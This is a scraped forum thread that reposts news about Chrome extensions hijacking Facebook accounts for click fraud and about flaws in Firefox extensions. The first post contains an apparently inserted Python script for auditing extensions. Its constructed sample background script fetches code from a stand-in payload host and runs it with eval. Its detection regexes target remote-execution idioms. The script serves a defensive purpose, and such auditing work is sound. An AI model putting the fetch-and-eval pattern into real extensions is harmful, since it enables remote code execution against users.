Chrome Browser Extensions Discovered Engaging in Facebook Click Fraud

Discussion in 'BlackHat Lounge' started by The Scarlet Pimp, Jul 22, 2016.

  1. The Scarlet Pimp

    The Scarlet Pimp Senior Member

    Apr 2, 2008
    Chair moistener.
    Google has removed a group of malicious browser extensions from its Chrome Web Store, after an independent Danish security researcher discovered that the programs were hijacking users' Facebook accounts for click fraud purposes, using them to "like" links to sketchy webpages.

    Maxime Kjaer, a 19-year-old computer science student, reported on his Output blog site that he uncovered the scheme after clicking one of several trashy links on Facebook that a friend of his supposedly liked.

    The link brought him to an adult-oriented content site requiring an age verification process that could only be completed, strangely enough, by first installing a Chrome extension that asks permission to "read and change all your data on the web sites you visit."

    Needless to say, this is a rather excessive request.

    The suspicious extension allegedly came from the viral content site, and was available in the Chrome store, along with nine other identical programs that collectively amassed over 132,000 users.

    After analyzing the extension's metadata, Kjaer determined that the age verification pop-up screen was entirely nonfunctional, merely serving as a decoy that concealed the true motives for obtaining such sweeping user permissions.

    However, another script within the code was more enlightening: this script was coded to download a payload from an external server and execute it.

    The payload, naturally, was malicious, designed to send links that direct users to a web page containing Facebook tokens, which the extension program can then grab and exfiltrate to the command-and-control server.

    Cybercriminals can potentially use these access tokens to hijack victims' accounts and use them to read and post messages, statuses and links – though it is unclear at this time exactly what the perpetrators did with the stolen tokens.

    Additionally, the malware instructs the extension to use victims' accounts as bots to generate false likes in Facebook-based click fraud campaigns. The malware's code also contained a function designed to subscribe victims to YouTube channels.

    And so, as Kjaer suspected, his friend did not really like those sketchy links. "As soon as I found out about the extension, I told him to uninstall it, log out and then log in again to his Facebook account to gain new access tokens," said Kjaer, in an email interview with

    "My friend told me that I was the first to notice it. He immediately unliked everything that the malware had liked for him, and I definitely think that he was glad to have it gone."

    Underhanded as this sounds, the creators of this malicious extension may have had even more nefarious plans in mind. Though no such activity appears to have taken place, Kjaer noted in his blog that the malware ultimately could have allowed its operators to read emails, steal additional credentials, obtain credit card information, launch distributed denial of service (DDoS) attacks, and more.

    "What I find scary is the fact that it is set up to auto-update regularly. Clearly the malware operators wanted it to be able to evolve," said Kjaer, who currently studies at the Swiss Federal Institute of Technology.


    Black Hat Asia: Researchers find reusable vulnerabilities in popular Firefox extensions

    Flaws affecting popular Firefox extensions were disclosed by researchers at Black Hat Asia in Singapore. The reusable vulnerabilities were discovered by Northeastern University PhD candidate Ahmet Buyukkayhan and assistant professor William Robertson.

    The attacks use functionality from non-malicious extensions to bypass Mozilla's security checks and use elevated privileges of extensions to access browsing history, passwords, and user information.

    The team researched 2,000 Firefox extensions and found several Firefox extensions, including NoScript, Video DownloadHelper, and GreaseMonkey are affected.

    One of the extensions, NoScript, is a favorite extension commonly used to prevent malware infection by limiting code execution. These extensions have each been downloaded by millions of users.

    Robertson is a co-director of Systems Security Lab at Northeastern University and a consultant at Lastline Labs.

    There is no readily available patch for the extension vulnerabilities. It is suggested that users uninstall the extensions. Mozilla did not reply to requests for comment by press time.

    UPDATE: Mozilla replied to an earlier request for comment with the following statement from Nick Nguyen, VP of Product for Firefox:

    "The way add-ons are implemented in Firefox today allows for the scenario hypothesized and presented at Black Hat Asia. The method described relies on a popular add-on that is vulnerable to be installed, and then for the add-on that takes advantage of that vulnerability to also be installed.

    "Because risks such as this one exist, we are evolving both our core product and our extensions platform to build in greater security. The new set of browser extension APIs that make up WebExtensions, which are available in Firefox today, are inherently more secure than traditional add-ons, and are not vulnerable to the particular attack outlined in the presentation at Black Hat Asia.

    As part of our electrolysis initiative - our project to introduce multi-process architecture to Firefox later this year - we will start to sandbox Firefox extensions so that they cannot share code."
    • Thanks x 2
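One defensive check for the signals the article above describes (a sweeping "read and change all your data" host permission, a payload fetched from an external server and executed, and a self-hosted auto-update channel), written as an added example for this thread and not taken from the article or from Kjaer's analysis: a small Python audit of an extension's manifest.json and background script. The manifest, the script, and the `.example.invalid` hosts are constructed sample data; the regexes are heuristics meant to flag an extension for manual review, not to prove it malicious.

```python
"""Audit a Chrome extension for the risk signals discussed in the thread.
Added example; the sample manifest and script below are constructed."""
import json
import re

# Host patterns that trigger Chrome's "read and change all your data on the
# websites you visit" warning.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# API permissions that materially raise impact once broad host access exists.
SENSITIVE_API_PERMISSIONS = {"tabs", "cookies", "webRequest", "webRequestBlocking",
                             "history", "nativeMessaging", "debugger", "management"}

# Idioms that turn downloaded text into running code.
REMOTE_EXEC_PATTERNS = [
    (r"\beval\s*\(", "eval() call"),
    (r"\bnew\s+Function\s*\(", "Function constructor"),
    (r"executeScript\s*\([^)]*\bcode\s*:", "tabs.executeScript with a code string"),
    (r"<script[^>]*\bsrc\s*=\s*['\"]https?://", "remote <script src>"),
]

# Extensions distributed through the Chrome Web Store update from this URL;
# anything else means the developer controls the update channel.
WEB_STORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"


def audit_manifest(manifest: dict) -> list:
    """Return a list of human-readable findings for one manifest."""
    findings = []
    # MV2 mixes API and host permissions in "permissions"; MV3 splits them.
    perms = list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", []))
    broad = sorted(p for p in perms if p in BROAD_HOST_PATTERNS)
    if broad:
        findings.append("broad host access: " + ", ".join(broad))
    sensitive = sorted(p for p in perms if p in SENSITIVE_API_PERMISSIONS)
    if sensitive and broad:
        findings.append("sensitive APIs combined with broad host access: " + ", ".join(sensitive))
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):  # MV3 form: {"extension_pages": "..."}
        csp = csp.get("extension_pages", "")
    if "unsafe-eval" in csp:
        findings.append("CSP allows unsafe-eval")
    if re.search(r"script-src[^;]*\bhttps?://", csp):
        findings.append("CSP allows remote script sources")
    update_url = manifest.get("update_url")
    if update_url and update_url != WEB_STORE_UPDATE_URL:
        findings.append("self-hosted update_url: " + update_url)
    return findings


def audit_source(js: str) -> list:
    """Flag code-execution idioms, and note when a network fetch sits beside them."""
    findings = []
    for pattern, label in REMOTE_EXEC_PATTERNS:
        if re.search(pattern, js):
            findings.append("remote-execution idiom: " + label)
    # Fetching text and handing it to an executor is the "download a payload
    # and execute it" behaviour the article describes.
    if findings and re.search(r"\b(fetch|XMLHttpRequest)\b", js):
        findings.append("network fetch present alongside code-execution idiom")
    return findings


def audit(manifest: dict, sources: dict) -> dict:
    """Audit a manifest plus {filename: javascript} sources; return findings per file."""
    report = {"manifest.json": audit_manifest(manifest)}
    for name, js in sources.items():
        hits = audit_source(js)
        if hits:
            report[name] = hits
    return report


# Constructed sample modelled on the behaviour described in the article.
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 2,
  "name": "Age Verify Helper (constructed sample)",
  "version": "1.4",
  "permissions": ["tabs", "cookies", "<all_urls>"],
  "content_security_policy": "script-src 'self' 'unsafe-eval' https://cdn.example.invalid; object-src 'self'",
  "update_url": "https://updates.example.invalid/ext.xml",
  "background": {"scripts": ["bg.js"]}
}
""")

SAMPLE_BACKGROUND_JS = """
// constructed sample: fetch a script from a server and run it
fetch('https://payload.example.invalid/p.js')
  .then(r => r.text())
  .then(code => eval(code));
"""

if __name__ == "__main__":
    for filename, hits in audit(SAMPLE_MANIFEST, {"bg.js": SAMPLE_BACKGROUND_JS}).items():
        print(filename)
        for hit in hits:
            print("  -", hit)
```

Run it against an unpacked extension directory by loading its manifest.json and each script it references; an extension with only `storage` and no remote-execution idioms produces an empty report, while the constructed sample above yields five manifest findings and two source findings.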
  2. Sherb

    Sherb Jr. Executive VIP Jr. VIP

    Dec 26, 2010
    Perpetual Polymath
    Florida, USA
  3. Neon

    Neon Jr. VIP Jr. VIP

    Nov 3, 2013
    Traveling the world
    Too long, I don't have time to read it, because I'm busy! What else to write in my diary hmm today I went to the doctor and everything went fine, bought 16 beers, received my sim cards, printed 2 documents and now I'm going to eat pizza. That's all dear diary, bye.
  4. Reaver

    Reaver Jr. VIP Jr. VIP

    Aug 6, 2015
    Unlike the very lazy pup above me, I actually read your post.

    I always read the permissions of something before I agree to download it. There are reasonable extension requests, and then there's "Let me read everything you're doing and modify it whenever I feel like it."

    It amazes me that people just blindly click "OK" on these things. If you just took two seconds to read what they were asking you, and used common sense, you could save yourself a whole lot of trouble.
    • Thanks x 1